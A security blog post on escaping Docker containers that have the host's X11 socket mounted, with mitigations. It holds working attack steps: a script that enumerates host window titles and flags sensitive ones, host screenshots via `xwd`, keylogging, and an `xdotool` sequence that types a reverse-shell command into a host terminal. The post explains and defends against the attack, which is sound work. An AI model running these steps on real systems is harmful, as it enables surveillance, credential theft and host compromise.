Use Docker to run GUI applications they said.
Mount the X11 socket they said.
Allow other users to access your X session they said.
This post covers Docker container breakouts by abusing bad security practices related to the X11 socket.
The problem
To display windows spawned through a Docker container, people often launch containers following these steps:
- Use `-e DISPLAY=$DISPLAY` to pass the display name into the container.
- Mount the X11 socket with `-v /tmp/.X11-unix:/tmp/.X11-unix:ro`, optionally read only.
- "I can't see the window, let's google..."
- "Let's just execute `xhost +local:root` and it works!"
The X11 socket is mounted as read only - it's secure, right? It isn't: `:ro` only makes the bind mount read-only for file operations, and connecting to a Unix socket is not one of them, so every process in the container can still talk to the host's X server. Worse, `xhost +local:root` does not restrict access to root: it admits every local connection, whatever its UID.
The breakout(s)
These attacks can be performed after gaining access to a Docker container:
Reading Window Information
Running `xwininfo -root -tree` inside the container lists every window open on the host's display, including the window titles (output abbreviated, ids redacted):

```
[...]
0xredacted "[i3 con] container around 0xredacted": ("i3-frame" "i3-frame") [...]
   1 child:
   0xredacted "Write: super secret thing": ("Msgcompose" "Thunderbird") [...]
[...]
```
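An added example (not code from the original post) that automates the enumeration step: it checks whether the socket the container was given actually answers, then pulls the titles out of `xwininfo -root -tree` and flags the ones that look sensitive. The `SAMPLE` listing is constructed to resemble the redacted output above; the window ids in it are made up.

```shell
#!/bin/sh
# Added example, not code from the original post. Enumerate window titles on
# the host display from inside a container and flag sensitive-looking ones.

# Map a DISPLAY value such as ":0", ":1.0" or "host:2.1" to its Unix socket path.
x11_socket_path() {
    d="${1#*:}"          # strip "host:"   -> "0" / "1.0" / "2.1"
    d="${d%%.*}"         # strip ".screen" -> "0" / "1"   / "2"
    printf '/tmp/.X11-unix/X%s\n' "$d"
}

# Return 0 if the socket exists and the server answers (xdpyinfo needs DISPLAY).
x11_reachable() {
    [ -S "$(x11_socket_path "${DISPLAY:-}")" ] && xdpyinfo >/dev/null 2>&1
}

# Print one title per window from `xwininfo -root -tree` output on stdin.
# Lines carrying a title look like:  0x2400006 "Title": ("class" "Class") ...
window_titles() {
    sed -n 's/^ *0x[0-9a-fA-F]* "\([^"]*\)".*/\1/p'
}

# Print only the titles matching a case-insensitive extended regex.
sensitive_titles() {
    window_titles | grep -iE "$1"
}

WATCH='secret|password|passphrase|login|token|vault'

# Constructed sample of `xwininfo -root -tree` output (ids are made up).
SAMPLE='xwininfo: Window id: 0x1e5 (the root window) (has no name)

  Root window id: 0x1e5 (the root window) (has no name)
  Parent window id: 0x0 (none)
     3 children:
     0x1e00004 "[i3 con] container around 0x2400006": ("i3-frame" "i3-frame")  1280x720+0+0  +0+0
        1 child:
        0x2400006 "Write: super secret thing": ("Msgcompose" "Thunderbird")  1280x720+0+0  +0+0
     0x1a00003 "Password Manager - KeePassXC": ("keepassxc" "KeePassXC")  800x600+100+50  +100+50
     0x1c00002 (has no name): ()  1x1+0+0  +0+0'

case "${1:-}" in
    --live)
        # Inside a container: only worth trying if the mounted socket really answers.
        x11_reachable || { echo "no usable X display" >&2; exit 1; }
        xwininfo -root -tree | sensitive_titles "$WATCH"
        ;;
    *)
        # Offline demo on the constructed sample.
        printf '%s\n' "$SAMPLE" | sensitive_titles "$WATCH" || true
        ;;
esac
```

Run it with `--live` inside a container that has the socket mounted; without arguments it only parses the constructed sample. The reachability check matters because the `:ro` mount of `/tmp/.X11-unix` says nothing about whether the server accepts the connection; `xdpyinfo` succeeding is what proves the container is on the display.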
Taking screenshots
The command

```
xwd -root -screen > screenshot.xwd && convert screenshot.xwd screenshot.png
```

creates a screenshot of the host's display, which makes it possible to watch every action a user performs on the system.
Keylogging
Mounting the X11 socket into the container shares more than the display: keyboard input reaches every connected X client as well, so it's possible to log all keystrokes. There may be better tools for this, but during tests xkey performed very reliably. Using xkey, it's also possible to trigger a specific action when a previously defined key is hit.
Getting a shell
Although it's not very stealthy, this method allows getting a shell on the host system. It works by sending keystrokes to the X server in order to open a terminal and execute commands:

```
xdotool key <Shortcut to open a terminal>
xdotool type 'xterm'
xdotool key Return
xdotool type --delay 50 '<Desired reverse or bind shell command>'
xdotool key Return
```
The mitigation
- Authenticate clients with an Xauthority cookie (pass a cookie file into the container via `XAUTHORITY`) instead of opening the display with `xhost +local:root`, and don't run the X application as root. Note what this buys you: a cookie keeps other local users off the display, but a client that holds it still has full access, so it limits who can connect, not what a connected client can do.
- Check x11docker, which runs the container against its own X server (one per container) for isolation, so the container never talks to the host's display at all.
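An added example of the first mitigation, written for this page rather than taken from the post or from x11docker: it derives a per-launch MIT-MAGIC-COOKIE-1 file from the host's cookie, checks that `xhost` has not been left wide open, and launches the container as the invoking user with the cookie mounted read-only. The image name `gui-app:latest` and the cookie path `/tmp/.docker.xauth` are assumptions.

```shell
#!/bin/sh
# Added example, not the post's or x11docker's code: hand the container a
# per-launch cookie instead of `xhost +local:root`, and run it unprivileged.

IMAGE="${IMAGE:-gui-app:latest}"                 # assumed image name
XAUTH_FILE="${XAUTH_FILE:-/tmp/.docker.xauth}"   # assumed cookie file for the container

# Read `xhost` output from stdin; return 0 if the display is open to every
# local user. `xhost +local:root` shows up as "LOCAL:" (the name after
# "local:" is not used for matching), i.e. all local connections are allowed.
xhost_local_open() {
    grep -Eq '^(LOCAL:|SI:localuser:root)$'
}

# `xauth nlist` prints one cookie per line; the first field is the address
# family. Rewriting it to ffff (FamilyWild) makes the cookie match whatever
# hostname the container ends up with.
wildcard_family() {
    sed -e 's/^..../ffff/'
}

# Write a cookie file for the container derived from the host's cookie.
make_container_xauth() {
    rm -f "$XAUTH_FILE"
    (umask 077 && touch "$XAUTH_FILE")
    xauth nlist "$DISPLAY" | wildcard_family | xauth -f "$XAUTH_FILE" nmerge -
}

# Print the hardened docker run command: caller's uid, cookie mounted
# read-only, XAUTHORITY pointing at it, and no `xhost` change at all.
# The socket mount itself is the same as in the weak setup.
docker_x11_cmd() {
    printf 'docker run --rm -it --user %s:%s -e DISPLAY=%s -e XAUTHORITY=%s -v %s:%s:ro -v /tmp/.X11-unix:/tmp/.X11-unix:ro %s\n' \
        "$(id -u)" "$(id -g)" "$DISPLAY" "$XAUTH_FILE" "$XAUTH_FILE" "$XAUTH_FILE" "$IMAGE"
}

case "${1:-}" in
    --run)
        [ -n "${DISPLAY:-}" ] || { echo "DISPLAY is not set" >&2; exit 1; }
        if xhost | xhost_local_open; then
            echo "warning: xhost grants every local user access; revoke with: xhost -local:" >&2
        fi
        make_container_xauth
        eval "$(docker_x11_cmd)"
        ;;
    *)
        # Dry run: only print the command that --run would execute.
        if [ -z "${DISPLAY:-}" ]; then DISPLAY=:0; fi
        docker_x11_cmd
        ;;
esac
```

Without arguments the script only prints the `docker run` line so it can be inspected; `--run` builds the cookie file and executes it. Keep the caveat from the list above in mind: the cookie stops other local users, but everything in the breakout section still works for a process inside this container, because X11 gives every authenticated client the same access to the display. Isolation needs a separate X server per container, which is what x11docker provides.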